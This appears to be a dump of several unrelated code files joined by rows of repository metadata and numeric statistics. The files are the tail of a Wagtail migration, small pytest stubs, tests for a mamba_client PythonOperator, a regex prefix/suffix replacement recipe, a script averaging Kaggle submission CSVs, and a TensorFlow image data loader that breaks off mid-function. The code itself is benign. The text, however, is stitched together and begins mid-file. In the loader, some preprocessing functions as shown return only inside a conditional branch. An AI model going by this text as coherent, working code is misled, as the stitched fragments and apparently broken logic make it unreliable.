('content_editor_en', wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title'))])), ('aligned_html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock([('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))], icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))], blank=True, null=True)),
('content_editor_fr', wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title'))])), ('aligned_html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock([('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))], icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))], blank=True, null=True)),
('content_editor_es', wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title'))])), ('aligned_html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock([('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))], icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))], blank=True, null=True)),
('content_editor_pt', wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title'))])), ('aligned_html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock([('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))], icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))], blank=True, null=True)),
('ssot_path', models.TextField(blank=True, help_text='Folder path of SSOT object', null=True)),
('tag', models.CharField(help_text='Associated git release tag', max_length=255)),
('data', models.TextField(blank=True, help_text='HTML data for the page', null=True)),
('data_en', models.TextField(blank=True, help_text='HTML data for the page', null=True)),
('data_fr', models.TextField(blank=True, help_text='HTML data for the page', null=True)),
('data_es', models.TextField(blank=True, help_text='HTML data for the page', null=True)),
('data_pt', models.TextField(blank=True, help_text='HTML data for the page', null=True)),
('header_image', models.ForeignKey(blank=True, help_text='This is the image that will appear in the header banner at the top of the page. If no image is added a placeholder image will be used.', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('social_media_image', models.ForeignKey(blank=True, help_text='This image will be used as the image for social media sharing cards.', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.AddField(
model_name='iatistandardpage',
name='latest_version_page',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='iati_standard.ActivityStandardPage'),
),
]
| 144.256983 | 1,461 | 0.694137 | 3,026 | 25,822 | 5.828817 | 0.073364 | 0.099161 | 0.141683 | 0.076653 | 0.905545 | 0.897834 | 0.891484 | 0.887346 | 0.884227 | 0.874532 | 0 | 0.005301 | 0.130586 | 25,822 | 178 | 1,462 | 145.067416 | 0.780356 | 0.001781 | 0 | 0.703488 | 1 | 0.017442 | 0.255645 | 0.01098 | 0.034884 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052326 | 0 | 0.069767 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
74dbfde73e74c176e2a57ff4ecdac83184f8ee9f | 49 | py | Python | test/test_brainflow.py | timeflux/timeflux_brainflow | f93545c6400522f886d9770aa6688d8955bfd34c | [
"MIT"
] | 3 | 2020-03-22T01:20:59.000Z | 2021-09-02T19:03:03.000Z | test/test_brainflow.py | timeflux/timeflux_brainflow | f93545c6400522f886d9770aa6688d8955bfd34c | [
"MIT"
] | 1 | 2021-04-03T19:50:15.000Z | 2021-04-03T22:52:13.000Z | test/test_openbci.py | timeflux/timeflux_openbci | 818d6651bd2211f462d98ce6f7322c2838bf8686 | [
"MIT"
] | 3 | 2020-02-03T23:37:59.000Z | 2020-07-02T19:09:34.000Z | import pytest
def test_none():
assert True
| 8.166667 | 16 | 0.693878 | 7 | 49 | 4.714286 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.244898 | 49 | 5 | 17 | 9.8 | 0.891892 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
741fd749e944fb9fa9167ecf62d8cb5939d4149d | 44 | py | Python | src/lib/modulefinder.py | DTenore/skulpt | 098d20acfb088d6db85535132c324b7ac2f2d212 | [
"MIT"
] | 2,671 | 2015-01-03T08:23:25.000Z | 2022-03-31T06:15:48.000Z | src/lib/modulefinder.py | wakeupmuyunhe/skulpt | a8fb11a80fb6d7c016bab5dfe3712517a350b347 | [
"MIT"
] | 972 | 2015-01-05T08:11:00.000Z | 2022-03-29T13:47:15.000Z | src/lib/modulefinder.py | wakeupmuyunhe/skulpt | a8fb11a80fb6d7c016bab5dfe3712517a350b347 | [
"MIT"
] | 845 | 2015-01-03T19:53:36.000Z | 2022-03-29T18:34:22.000Z | import _sk_fail; _sk_fail._("modulefinder")
| 22 | 43 | 0.795455 | 6 | 44 | 5 | 0.666667 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068182 | 44 | 1 | 44 | 44 | 0.731707 | 0 | 0 | 0 | 0 | 0 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
742a4e824e818128abb206e0b067a47b2ab34eba | 7,032 | py | Python | tests/flow/test_python_operator.py | ismaelJimenez/mamba_client | 2be6a14d61bbcd16db020f41146cca63c17ebf50 | [
"MIT"
] | null | null | null | tests/flow/test_python_operator.py | ismaelJimenez/mamba_client | 2be6a14d61bbcd16db020f41146cca63c17ebf50 | [
"MIT"
] | null | null | null | tests/flow/test_python_operator.py | ismaelJimenez/mamba_client | 2be6a14d61bbcd16db020f41146cca63c17ebf50 | [
"MIT"
] | null | null | null | import pytest
import time
from mamba_client.testing.utils import CallbackTestClass
from mamba_client.flow.operator.lifecycle import OperatorLifecycle
from mamba_client.station import Station
from mamba_client.flow.exceptions import MambaFlowException
from mamba_client.flow.operator import PythonOperator
class TestClass:
def test_python_operator(self):
cb = CallbackTestClass()
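        # Each python_callable below receives (iteration, station, context,
        # op_args) -- abbreviated (it, st, cxt, args) -- and forwards one of
        # them to the callback recorder so the test can assert on its value.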
operator = PythonOperator(
operator_id='op_1',
schedule=0,
python_callable=lambda it, st, cxt, args: cb.test_func_1(it))
assert operator.ready(0, {})
assert operator._lifecycle == OperatorLifecycle.no_status
assert cb.func_1_calls == []
operator.execute(0)
assert cb.func_1_calls == [0]
assert operator._lifecycle == OperatorLifecycle.success
assert not operator.ready(0, {})
operator = PythonOperator(
operator_id='op_1',
schedule=0,
op_args='asd',
python_callable=lambda it, st, cxt, args: cb.test_func_1(args))
assert operator.ready(0, {})
assert operator._lifecycle == OperatorLifecycle.no_status
assert cb.func_1_calls == [0]
operator.execute(0)
assert cb.func_1_calls == [0, 'asd']
assert operator._lifecycle == OperatorLifecycle.success
assert not operator.ready(0, {})
station = Station(station_id='station_1')
operator = PythonOperator(
operator_id='op_1',
schedule=0,
op_args='asd',
station=station,
python_callable=lambda it, st, cxt, args: cb.test_func_1(st))
assert operator.ready(0, {})
assert operator._lifecycle == OperatorLifecycle.no_status
assert cb.func_1_calls == [0, 'asd']
operator.execute(0)
assert cb.func_1_calls == [0, 'asd', station]
assert operator._lifecycle == OperatorLifecycle.success
assert not operator.ready(0, {})
operator = PythonOperator(
operator_id='op_1',
schedule=0,
op_args='asd',
station=station,
context={'a': 'b'},
python_callable=lambda it, st, cxt, args: cb.test_func_1(cxt))
assert operator.ready(0, {})
assert operator._lifecycle == OperatorLifecycle.no_status
assert cb.func_1_calls == [0, 'asd', station]
operator.execute(0)
assert cb.func_1_calls == [0, 'asd', station, {'a': 'b'}]
assert operator._lifecycle == OperatorLifecycle.success
assert not operator.ready(0, {})
operator = PythonOperator(
operator_id='op_1',
schedule=4,
python_callable=lambda it, st, cxt, args: cb.test_func_1(it))
assert not operator.ready(0, {})
assert operator.ready(4, {})
assert operator.ready(5, {})
operator = PythonOperator(
operator_id='op_1',
upstream='op_0',
python_callable=lambda it, st, cxt, args: cb.test_func_1(it))
assert not operator.ready(0, {})
assert operator.ready(0, {'op_0': OperatorLifecycle.success})
operator = PythonOperator(
operator_id='op_1',
schedule_ts=3,
python_callable=lambda it, st, cxt, args: cb.test_func_1(it))
assert not operator.ready(0, {})
time.sleep(1)
assert not operator.ready(0, {})
time.sleep(2.1)
assert operator.ready(0, {})
with pytest.raises(MambaFlowException) as excinfo:
PythonOperator(
operator_id='op_1',
schedule=0,
upstream='op_0',
python_callable=lambda it, st, cxt, args: cb.test_func_1(it))
assert str(excinfo.value
) == 'Operator op_1 can not have schedule and upstream'
with pytest.raises(MambaFlowException) as excinfo:
PythonOperator(
operator_id='op_1',
python_callable=lambda it, st, cxt, args: cb.test_func_1(it))
assert str(
excinfo.value) == 'Operator op_1 must have schedule or upstream'
with pytest.raises(MambaFlowException) as excinfo:
PythonOperator(operator_id='op_1',
schedule=0,
python_callable='text')
assert str(excinfo.value
) == 'Operator op_1 python_callable param must be callable'
with pytest.raises(MambaFlowException) as excinfo:
PythonOperator(
operator_id='op_1',
schedule='0',
python_callable=lambda it, st, cxt, args: cb.test_func_1(it))
assert str(excinfo.value
) == 'Operator op_1 schedule must be a positive integer'
with pytest.raises(MambaFlowException) as excinfo:
PythonOperator(
operator_id='op_1',
schedule=-1,
python_callable=lambda it, st, cxt, args: cb.test_func_1(it))
assert str(excinfo.value
) == 'Operator op_1 schedule must be a positive integer'
with pytest.raises(MambaFlowException) as excinfo:
PythonOperator(
operator_id='op_1',
schedule_ts='0',
python_callable=lambda it, st, cxt, args: cb.test_func_1(it))
assert str(excinfo.value
) == 'Operator op_1 schedule_ts must be a positive integer'
with pytest.raises(MambaFlowException) as excinfo:
PythonOperator(
operator_id='op_1',
schedule_ts=-1,
python_callable=lambda it, st, cxt, args: cb.test_func_1(it))
assert str(excinfo.value
) == 'Operator op_1 schedule_ts must be a positive integer'
operator = PythonOperator(
operator_id='op_1',
schedule=0,
python_callable=lambda it, st, cxt, args: cb.test_func_1(it),
log=lambda _: cb.test_func_2(_))
operator.execute(0)
assert len(cb.func_2_calls) == 2
assert '[op_1] Start Operator Execution' in cb.func_2_calls[0]
assert '[op_1] Stop Operator Execution' in cb.func_2_calls[1]
with pytest.raises(MambaFlowException) as excinfo:
PythonOperator(
operator_id='op_1',
schedule=0,
python_callable=lambda it, st, cxt, args: cb.test_func_1(it),
log='')
assert str(excinfo.value) == 'Operator op_1 log param must be callable'
with pytest.raises(MambaFlowException) as excinfo:
PythonOperator(
operator_id='op_1',
schedule=0,
schedule_ts=0,
python_callable=lambda it, st, cxt, args: cb.test_func_1(it),
log='')
assert str(excinfo.value
) == 'Operator op_1 can not have schedule and schedule_ts'
| 34.302439 | 79 | 0.585324 | 810 | 7,032 | 4.890123 | 0.095062 | 0.021207 | 0.052764 | 0.111588 | 0.8667 | 0.853067 | 0.844231 | 0.798788 | 0.797021 | 0.788185 | 0 | 0.022902 | 0.31698 | 7,032 | 204 | 80 | 34.470588 | 0.801791 | 0 | 0 | 0.737179 | 0 | 0 | 0.088311 | 0 | 0 | 0 | 0 | 0 | 0.282051 | 1 | 0.00641 | false | 0 | 0.044872 | 0 | 0.057692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7445d9a6a238059566a29f962d48358d9b159b19 | 362 | py | Python | recipes/Python/577252_lreplace_rreplace_Replace_beginning_ends/recipe-577252.py | tdiprima/code | 61a74f5f93da087d27c70b2efe779ac6bd2a3b4f | [
"MIT"
] | 2,023 | 2017-07-29T09:34:46.000Z | 2022-03-24T08:00:45.000Z | recipes/Python/577252_lreplace_rreplace_Replace_beginning_ends/recipe-577252.py | unhacker/code | 73b09edc1b9850c557a79296655f140ce5e853db | [
"MIT"
] | 32 | 2017-09-02T17:20:08.000Z | 2022-02-11T17:49:37.000Z | recipes/Python/577252_lreplace_rreplace_Replace_beginning_ends/recipe-577252.py | unhacker/code | 73b09edc1b9850c557a79296655f140ce5e853db | [
"MIT"
] | 780 | 2017-07-28T19:23:28.000Z | 2022-03-25T20:39:41.000Z | import re
def lreplace(pattern, sub, string):
"""
Replaces 'pattern' in 'string' with 'sub' if 'pattern' starts 'string'.
"""
return re.sub('^%s' % pattern, sub, string)
def rreplace(pattern, sub, string):
"""
Replaces 'pattern' in 'string' with 'sub' if 'pattern' ends 'string'.
"""
return re.sub('%s$' % pattern, sub, string)
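# Illustrative usage:
# >>> lreplace('foo', 'bar', 'foobaz')
# 'barbaz'
# >>> rreplace('baz', 'qux', 'foobaz')
# 'fooqux'
# Note that 'pattern' is interpreted as a regular expression, so escape
# metacharacters (e.g. with re.escape) when a literal match is intended.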
| 25.857143 | 75 | 0.60221 | 46 | 362 | 4.73913 | 0.347826 | 0.183486 | 0.293578 | 0.220183 | 0.816514 | 0.816514 | 0.816514 | 0.816514 | 0.504587 | 0.504587 | 0 | 0 | 0.220994 | 362 | 13 | 76 | 27.846154 | 0.77305 | 0.389503 | 0 | 0 | 0 | 0 | 0.031579 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0.2 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
744d3dea7d84fdc0ab694f357671c7a6d5d97698 | 1,242 | py | Python | combine_subs.py | NDKoehler/DataScienceBowl2017_7th_place | 638542c3cde5af45bf34d0391695ab0e54ce78b8 | [
"MIT"
] | 8 | 2017-05-19T10:30:20.000Z | 2022-03-12T05:17:19.000Z | combine_subs.py | NDKoehler/DataScienceBowl2017_7th_place | 638542c3cde5af45bf34d0391695ab0e54ce78b8 | [
"MIT"
] | 5 | 2017-07-03T10:55:29.000Z | 2018-09-10T18:05:14.000Z | combine_subs.py | NDKoehler/DataScienceBowl2017_7th_place | 638542c3cde5af45bf34d0391695ab0e54ce78b8 | [
"MIT"
] | 6 | 2017-05-12T00:58:05.000Z | 2019-01-22T05:08:09.000Z | import pandas as pd
import numpy as np
import os
from dsb3 import utils
outpath = './out/'
utils.ensure_dir(outpath)
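# Simple ensemble: read four submissions (2D/3D models; '05res'/'07res'
# presumably denote input resolutions) and average their 'cancer'
# probability columns into one combined submission.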
data1 = pd.read_csv('./datapipeline_final/dsb3_0/gen_submission_2D_05res_80/submission.csv')
data2 = pd.read_csv('./datapipeline_final/dsb3_0/gen_submission_2D_07res_80/submission.csv')
data3 = pd.read_csv('./datapipeline_final/dsb3_0/gen_submission_3D_05res_80/submission.csv')
data4 = pd.read_csv('./datapipeline_final/dsb3_0/gen_submission_3D_07res_80/submission.csv')
data1['cancer'] += data2['cancer']
data1['cancer'] += data3['cancer']
data1['cancer'] += data4['cancer']
data1['cancer'] /= 4
data1.to_csv(outpath + 'submission_80.csv', index = False)
data1 = pd.read_csv('./datapipeline_final/dsb3_0/gen_submission_2D_05res_100/submission.csv')
data2 = pd.read_csv('./datapipeline_final/dsb3_0/gen_submission_2D_07res_100/submission.csv')
data3 = pd.read_csv('./datapipeline_final/dsb3_0/gen_submission_3D_05res_100/submission.csv')
data4 = pd.read_csv('./datapipeline_final/dsb3_0/gen_submission_3D_07res_100/submission.csv')
data1['cancer'] += data2['cancer']
data1['cancer'] += data3['cancer']
data1['cancer'] += data4['cancer']
data1['cancer'] /= 4
data1.to_csv(outpath + 'submission_100.csv', index = False)
| 40.064516 | 93 | 0.775362 | 188 | 1,242 | 4.797872 | 0.191489 | 0.053215 | 0.079823 | 0.186253 | 0.844789 | 0.844789 | 0.844789 | 0.844789 | 0.844789 | 0.844789 | 0 | 0.079447 | 0.067633 | 1,242 | 30 | 94 | 41.4 | 0.699482 | 0 | 0 | 0.333333 | 0 | 0 | 0.548309 | 0.447665 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
744f140194e7e4e66c2db1f9dada4e4f2fdd88a5 | 15,923 | py | Python | VisionEngine/data_loaders/data_loader.py | ietheredge/VisionEngine | 271c8dcaef6eb574e9047fca436d7b13cab75d3b | [
"MIT"
] | 4 | 2020-09-29T14:17:25.000Z | 2022-03-05T18:04:33.000Z | VisionEngine/data_loaders/data_loader.py | ietheredge/VisionEngine | 271c8dcaef6eb574e9047fca436d7b13cab75d3b | [
"MIT"
] | null | null | null | VisionEngine/data_loaders/data_loader.py | ietheredge/VisionEngine | 271c8dcaef6eb574e9047fca436d7b13cab75d3b | [
"MIT"
] | 1 | 2022-03-07T17:38:30.000Z | 2022-03-07T17:38:30.000Z | """
Copyright (c) 2020 R. Ian Etheredge All rights reserved.
This work is licensed under the terms of the MIT license.
For a copy, see <https://opensource.org/licenses/MIT>.
"""
from VisionEngine.base.base_data_loader import BaseDataLoader
from VisionEngine.data_loaders.datasets import guppies, butterflies
import tensorflow as tf
import pathlib
import os
class DataLoader(BaseDataLoader):
def __init__(self, config):
super(DataLoader, self).__init__(config)
self.data_dir = pathlib.Path(
os.path.join(
os.getenv("VISIONENGINE_HOME"),
self.config.data_loader.folder_loc,
self.config.data_loader.dataset,
)
)
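        # Download the dataset on first use; afterwards the cached on-disk
        # copy is reused.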
if not os.path.exists(self.data_dir):
if self.config.data_loader.dataset == "guppies":
guppies.load_data()
elif self.config.data_loader.dataset == "butterflies":
butterflies.load_data()
else:
raise NotImplementedError
else:
print("Using cached dataset")
def get_train_data(self):
def alpha_blend_decoded_png(file):
# alpha blending with a white background
bg = tf.ones((256, 256, 3)) # change to tf.zeros for a black bg
r = ((1 - file[:, :, 3]) * bg[:, :, 0]) + (file[:, :, 3] * file[:, :, 0])
g = ((1 - file[:, :, 3]) * bg[:, :, 1]) + (file[:, :, 3] * file[:, :, 1])
b = ((1 - file[:, :, 3]) * bg[:, :, 2]) + (file[:, :, 3] * file[:, :, 2])
rgb = tf.stack([r, g, b], axis=2)
return rgb
def preprocess_input(path):
FILE = tf.io.read_file(path)
img = tf.image.decode_png(FILE, channels=0)
img = tf.image.convert_image_dtype(img, tf.float32)
img = alpha_blend_decoded_png(img)
output_img = img
if self.config.data_loader.augment is True:
img, output_img = self.random_jitter(img, output_img)
            if self.config.model.final_activation == "tanh":
                img, output_img = self.normalize(img, output_img)
            return img, output_img
def preprocess_input_celeba(path):
FILE = tf.io.read_file(path)
img = tf.image.decode_jpeg(FILE)
img = tf.image.convert_image_dtype(img, tf.float32)
img = tf.image.resize_with_pad(img, 256, 256)
output_img = img
if self.config.data_loader.augment is True:
img, output_img = self.random_jitter(img, output_img)
            if self.config.model.final_activation == "tanh":
                img, output_img = self.normalize(img, output_img)
            return img, output_img
def prepare_for_training(
ds,
cache=self.config.data_loader.cache,
shuffle=self.config.data_loader.shuffle,
shuffle_buffer_size=1000,
):
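            # Standard tf.data training pipeline: optionally cache (in memory,
            # or on disk when `cache` is a path string), shuffle, repeat
            # indefinitely, batch, and prefetch so training is not input-bound.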
if cache:
if isinstance(cache, str):
ds = ds.cache(cache)
else:
ds = ds.cache()
if shuffle:
ds = ds.shuffle(buffer_size=shuffle_buffer_size)
ds = ds.repeat()
ds = ds.batch(self.config.trainer.batch_size)
ds = ds.prefetch(buffer_size=tf.data.experimental.AUTOTUNE)
return ds
# butterfly dataset
if self.config.data_loader.dataset == "butterflies":
if self.config.data_loader.use_real is True:
if self.config.data_loader.use_generated is True:
raise NotImplementedError
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*/*"), seed=42
)
else:
raise NotImplementedError
# overwrite the number of samples in the config
self.config.data_loader.n_samples = len(list(list_data))
# preprocess and create dataset
ds = list_data.map(
preprocess_input, num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# guppy dataset
elif self.config.data_loader.dataset == "guppies":
if self.config.data_loader.use_real is True:
if self.config.data_loader.use_generated is True:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*/*"), seed=42
)
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*_*/*"), seed=42
)
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "[!a-z][!a-z]/*"), seed=42
)
# overwrite the number of samples in the config
self.config.data_loader.n_samples = len(list(list_data))
# preprocess and create dataset
ds = list_data.map(
preprocess_input, num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# celeba dataset
elif self.config.data_loader.dataset == "celeba":
if self.config.data_loader.use_real is True:
if self.config.data_loader.use_generated is True:
raise NotImplementedError
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*/*"), seed=42
)
else:
raise NotImplementedError
# overwrite the number of samples in the config
self.config.data_loader.n_samples = len(list(list_data))
# preprocess and create dataset
ds = list_data.map(
preprocess_input_celeba,
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
else:
raise NotImplementedError
# split train and eval
train_ds_size = int(
(1 - self.config.data_loader.validation_split)
* self.config.data_loader.n_samples
)
ds_train = ds.take(train_ds_size)
ds_val = ds.skip(train_ds_size)
# prepare splits for training
train_ds = prepare_for_training(ds_train)
validation_ds = prepare_for_training(ds_val)
return (train_ds, validation_ds)
def get_test_data(self):
def alpha_blend_decoded_png(file):
# alpha blending with a white background
bg = tf.ones((256, 256, 3)) # if you want black change to tf.zeros
r = ((1 - file[:, :, 3]) * bg[:, :, 0]) + (file[:, :, 3] * file[:, :, 0])
g = ((1 - file[:, :, 3]) * bg[:, :, 1]) + (file[:, :, 3] * file[:, :, 1])
b = ((1 - file[:, :, 3]) * bg[:, :, 2]) + (file[:, :, 3] * file[:, :, 2])
rgb = tf.stack([r, g, b], axis=2)
return rgb
def preprocess_input(path):
FILE = tf.io.read_file(path)
label = tf.strings.split(path, os.path.sep)[-2]
img = tf.image.decode_png(FILE, channels=0)
img = tf.image.convert_image_dtype(img, tf.float32)
img = alpha_blend_decoded_png(img)
if self.config.model.final_activation == "tanh":
img, _ = self.normalize(img, None)
return img, label
def preprocess_input_celeba(path):
FILE = tf.io.read_file(path)
img = tf.image.decode_jpeg(FILE)
img = tf.image.convert_image_dtype(img, tf.float32)
img = tf.image.resize_with_pad(img, 256, 256)
label = tf.strings.split(path, os.path.sep)[-2]
if self.config.model.final_activation == "tanh":
img, _ = self.normalize(img, None)
return img, label
def prepare_for_testing(
ds,
cache=self.config.data_loader.cache,
shuffle=self.config.data_loader.shuffle,
shuffle_buffer_size=100,
):
if cache:
if isinstance(cache, str):
ds = ds.cache(cache)
else:
ds = ds.cache()
if shuffle:
ds = ds.shuffle(shuffle_buffer_size)
ds = ds.batch(self.config.trainer.batch_size)
ds = ds.prefetch(buffer_size=tf.data.experimental.AUTOTUNE)
return ds
# butterfly dataset
if self.config.data_loader.dataset == "butterflies":
if self.config.data_loader.use_real is True:
if self.config.data_loader.use_generated is True:
raise NotImplementedError
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*/*"), shuffle=False, seed=42
)
else:
raise NotImplementedError
ds = list_data.map(
preprocess_input, num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# guppy dataset
elif self.config.data_loader.dataset == "guppies":
if self.config.data_loader.use_real is True:
if self.config.data_loader.use_generated is True:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*/*"), shuffle=False, seed=42
)
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*_*/*"), shuffle=False, seed=42
)
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "[!a-z][!a-z]/*"), shuffle=False, seed=42
)
ds = list_data.map(
preprocess_input, num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# celeba dataset
elif self.config.data_loader.dataset == "celeba":
if self.config.data_loader.use_real is True:
if self.config.data_loader.use_generated is True:
raise NotImplementedError
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*/*"), shuffle=False, seed=42
)
else:
raise NotImplementedError
ds = list_data.map(
preprocess_input_celeba,
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
else:
raise NotImplementedError
test_ds = prepare_for_testing(ds)
return test_ds
def get_plot_data(self):
def preprocess_input(path):
FILE = tf.io.read_file(path)
img = tf.image.decode_png(FILE)
label = tf.strings.split(path, os.path.sep)[-2]
return img, label
